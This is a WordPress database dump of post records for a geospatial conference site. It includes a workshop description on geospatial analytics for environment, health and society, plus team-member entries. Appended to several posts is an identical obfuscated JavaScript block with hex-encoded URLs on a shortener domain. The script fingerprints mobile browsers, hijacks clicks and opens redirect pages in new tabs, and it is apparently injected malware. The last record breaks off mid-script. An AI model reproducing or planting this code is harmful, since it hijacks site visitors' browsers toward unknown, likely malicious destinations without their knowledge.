(3428,1,'2022-12-07 03:54:45','2022-12-07 03:54:45','','w24m','','inherit','open','closed','','w24m','','','2022-12-07 03:54:45','2022-12-07 03:54:45','',3427,'https://gsw2023.com/wp-content/uploads/2022/12/w24m.jpg',0,'attachment','image/jpeg',0),
(3429,1,'2022-12-07 03:54:55','2022-12-07 03:54:55','','<strong>GEOSPATIAL DATA ANALYTICS FOR PHYSICAL GEOGRAPHY IMPACT ASSESSMENT ON ENVIRONMENT, HEALTH AND SOCIETY</strong>','','inherit','closed','closed','','3427-revision-v1','','','2022-12-07 03:54:55','2022-12-07 03:54:55','',3427,'https://gsw2023.com/?p=3429',0,'revision','',0),
(3430,1,'2022-12-07 03:59:44','2022-12-07 03:59:44','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\n<h5 style=\"text-align: justify;\" ><em> </em>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\n<h5 style=\"text-align: justify;\"><em> </em><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\n<h5><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>GEOSPATIAL DATA ANALYTICS FOR PHYSICAL GEOGRAPHY IMPACT ASSESSMENT ON ENVIRONMENT, HEALTH AND SOCIETY</strong>','','inherit','closed','closed','','3427-revision-v1','','','2022-12-07 03:59:44','2022-12-07 03:59:44','',3427,'https://gsw2023.com/?p=3430',0,'revision','',0),
(3431,1,'2022-12-07 04:03:33','2022-12-07 04:03:33','<!-- wp:paragraph -->\n<p>ISPRS WG III/9 on <strong>Geospatial Environment and Health</strong></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof Muralikrishna Iyyanki     ','','publish','closed','closed','','prof-muralikrishna-iyyanki','','','2022-12-07 04:04:14','2022-12-07 04:04:14','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3431',0,'dt_team','',0),
(3432,1,'2022-12-07 04:02:37','2022-12-07 04:02:37','','w241','','inherit','open','closed','','w241','','','2022-12-07 04:02:37','2022-12-07 04:02:37','',3431,'https://gsw2023.com/wp-content/uploads/2022/12/w241.jpg',0,'attachment','image/jpeg',0),
(3433,1,'2022-12-07 04:06:17','2022-12-07 04:06:17','<!-- wp:paragraph -->\n<p>ISPRS WG III/6 on <strong>Remote Sensing of Atmosphere</strong></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\'